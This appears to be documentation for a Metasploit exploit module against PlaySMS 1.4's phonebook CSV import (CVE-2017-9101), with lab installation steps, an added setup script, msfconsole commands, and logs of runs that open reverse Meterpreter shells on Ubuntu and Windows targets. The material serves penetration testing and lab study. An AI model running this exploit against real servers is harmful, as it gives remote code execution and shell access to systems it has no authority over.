## Description

A malicious file can be uploaded by an authenticated attacker through `import.php` (the Phonebook import feature) in PlaySMS version 1.4. The module logs in with a valid PlaySMS account, uploads a crafted CSV through that feature and, as the PHP Meterpreter sessions in the scenarios below show, ends up executing code as the web server user. Additional information is available on Exploit-DB [42044](https://www.exploit-db.com/exploits/42044/) and under [CVE-2017-9101](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9101).

## Vulnerable Application

PlaySMS 1.4 is available from [Exploit-DB](https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz).

### Installation

1. Download the application: `wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz`
2. Extract it: `tar -xvf 577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz`
3. Move the web tree into the web root: `mv playsms-1.4/web/* /var/www/html/`
4. Create the config file: `cp /var/www/html/config-dist.php /var/www/html/config.php`
5. Set the owner: `chown -R www-data:www-data /var/www/html/`
6. Set the database credentials in `config.php`, then load `playsms-1.4/db/playsms.sql` into your playsms database.
7. Visit http://localhost/

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/multi/http/playsms_uploadcsv_exec`
4. Do: `set rport <port>`
5. Do: `set rhost <target>`
6. Do: `set targeturi SecreTSMSgatwayLogin` (the path PlaySMS is served from; with the installation above it sits at the web root, the scenarios below use `SecreTSMSgatwayLogin` and `web`)
7. Do: `set username touhid` (the module needs a valid PlaySMS login)
8. Do: `set password diana`
9. Do: `check`

   ```
   [*] 10.22.1.10:80 The target appears to be vulnerable.
   ```

10. Do: `set lport <port>`
11. Do: `set lhost <your address>`
12. Do: `exploit`
13. You should get a shell.

## Scenarios

### PlaySMS on Ubuntu Linux

```
msf > use exploit/multi/http/playsms_uploadcsv_exec
msf exploit(multi/http/playsms_uploadcsv_exec) > set rhost 10.22.1.7
rhost => 10.22.1.7
msf exploit(multi/http/playsms_uploadcsv_exec) > set targeturi SecreTSMSgatwayLogin
targeturi => SecreTSMSgatwayLogin
msf exploit(multi/http/playsms_uploadcsv_exec) > check
[*] 10.22.1.7:80 The target appears to be vulnerable.
msf exploit(multi/http/playsms_uploadcsv_exec) > set username touhid
username => touhid
msf exploit(multi/http/playsms_uploadcsv_exec) > set password diana
password => diana
msf exploit(multi/http/playsms_uploadcsv_exec) > set lhost 10.22.1.3
lhost => 10.22.1.3
msf exploit(multi/http/playsms_uploadcsv_exec) > run
[*] Started reverse TCP handler on 10.22.1.3:4444
[+] X-CSRF-Token for login : c9ad6a45cd206228554b237985b344ef
[*] Trying to Login ......
[+] Authentication successful: touhid:diana
[+] X-CSRF-Token for upload : 112cd5ecbdf12daf60391609d19ae3d6
[*] Trying to upload malicious CSV file ....
[*] Sending stage (37543 bytes) to 10.22.1.7
[*] Meterpreter session 2 opened (10.22.1.3:4444 -> 10.22.1.7:56580) at 2018-03-25 17:42:43 +0530

meterpreter > sysinfo
Computer    : Dina
OS          : Linux Dina 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686
Meterpreter : php/linux
meterpreter >
```

### PlaySMS on Windows 7

```
msf > use exploit/multi/http/playsms_uploadcsv_exec
msf exploit(multi/http/playsms_uploadcsv_exec) > set rhost 10.22.1.9
rhost => 10.22.1.9
msf exploit(multi/http/playsms_uploadcsv_exec) > set targeturi web
targeturi => web
msf exploit(multi/http/playsms_uploadcsv_exec) > check
[*] 10.22.1.9:80 The target appears to be vulnerable.
msf exploit(multi/http/playsms_uploadcsv_exec) > set username test
username => test
msf exploit(multi/http/playsms_uploadcsv_exec) > set password metasploit
password => metasploit
msf exploit(multi/http/playsms_uploadcsv_exec) > set verbose true
verbose => true
msf exploit(multi/http/playsms_uploadcsv_exec) > exploit
[*] Started reverse TCP handler on 10.22.1.3:4444
[+] X-CSRF-Token for login : cf467bf4829b355a5f4f2964e853ff2c
[*] Trying to Login ......
[+] Authentication successful: test:metasploit
[+] X-CSRF-Token for upload : 3aca00c2d6a5988ed74fa7d992e14904
[*] Trying to upload malicious CSV file ....
[*] Sending stage (37543 bytes) to 10.22.1.9
[*] Meterpreter session 1 opened (10.22.1.3:4444 -> 10.22.1.9:50065) at 2018-03-25 17:27:57 +0530

meterpreter > sysinfo
Computer    : TOUHID-PC
OS          : Windows NT TOUHID-PC 6.1 build 7600 (Windows 7 Ultimate Edition) i586
Meterpreter : php/windows
meterpreter >
```
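The installation procedure under Vulnerable Application above, as a script, with the database step that the list leaves as prose (creating the database, writing the credentials into `config.php`, loading `playsms.sql`) spelled out. This is an added example, not part of the module documentation or of the PlaySMS project. It assumes a Debian/Ubuntu host with Apache, PHP and a MySQL/MariaDB server already installed and root access to that server, and it assumes that `config-dist.php` stores its database settings as `$core_config['db']['<key>'] = '<value>';` lines (an assumption about the PlaySMS config format, not something the page states). The helper names (`set_db_option`, `get_db_option`, `write_db_config`, `install_playsms`) and the `install` argument are this example's own.

```shell
#!/bin/sh
# Lab setup for PlaySMS 1.4 (CVE-2017-9101), scripted from the manual install steps.
# Assumptions (not from the page): Debian/Ubuntu paths, Apache + PHP installed,
# a MySQL/MariaDB server (5.7+/10.1+) reachable as root, and a config-dist.php
# whose DB settings are lines of the form  $core_config['db']['<key>'] = '<value>';
set -eu

TARBALL=577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz
URL="https://www.exploit-db.com/apps/$TARBALL"
WEBROOT=${WEBROOT:-/var/www/html}

# Rewrite one  $core_config['db']['<key>'] = '...';  line in a PlaySMS config file.
# Values must not contain the sed delimiter '|' or a literal '&'.
set_db_option() {
  file=$1 key=$2 val=$3
  sed "s|^[$]core_config\\['db']\\['$key'] = '[^']*';|\$core_config['db']['$key'] = '$val';|" \
    "$file" > "$file.tmp" && mv "$file.tmp" "$file"
}

# Read a value back so the caller can confirm the edit took effect.
get_db_option() {
  file=$1 key=$2
  sed -n "s|^[$]core_config\\['db']\\['$key'] = '\\([^']*\\)';|\\1|p" "$file"
}

# Step 6 (first half): set host/user/pass/name in config.php in one call.
write_db_config() {
  file=$1 host=$2 user=$3 pass=$4 name=$5
  set_db_option "$file" host "$host"
  set_db_option "$file" user "$user"
  set_db_option "$file" pass "$pass"
  set_db_option "$file" name "$name"
}

# Steps 1-7 end to end. Network and root privileges required; only run on a lab host.
install_playsms() {
  db_user=${1:-playsms} db_pass=${2:-playsms} db_name=${3:-playsms}
  wget -q "$URL"                                          # step 1: download
  tar -xf "$TARBALL"                                      # step 2: extract
  cp -r playsms-1.4/web/. "$WEBROOT/"                     # step 3: web tree into the web root (copy keeps the source tree)
  cp "$WEBROOT/config-dist.php" "$WEBROOT/config.php"     # step 4: create config.php
  write_db_config "$WEBROOT/config.php" localhost "$db_user" "$db_pass" "$db_name"   # step 6: credentials
  # step 6 (second half): create the database and user, then load the schema dump
  mysql -u root -e "CREATE DATABASE IF NOT EXISTS \`$db_name\`;
    CREATE USER IF NOT EXISTS '$db_user'@'localhost' IDENTIFIED BY '$db_pass';
    GRANT ALL ON \`$db_name\`.* TO '$db_user'@'localhost';"
  mysql -u root "$db_name" < playsms-1.4/db/playsms.sql
  chown -R www-data:www-data "$WEBROOT"                   # step 5: ownership (after config.php exists)
  echo "PlaySMS installed; open http://localhost/ (step 7) and set TARGETURI to / in the module"
}

# Only run the installer when explicitly asked, so the helpers can be sourced or tested safely.
if [ "${1:-}" = "install" ]; then
  install_playsms "${2:-playsms}" "${3:-playsms}" "${4:-playsms}"
fi
```

Run it as `sh install.sh install <db_user> <db_pass> <db_name>` on the lab host. The config editing is kept in its own functions because it is the part most worth checking before the web server ever starts: a wrong `pass` or `name` line produces a PlaySMS that serves a login page but cannot authenticate anyone, and the module then fails at "Trying to Login" rather than telling you the lab is misconfigured.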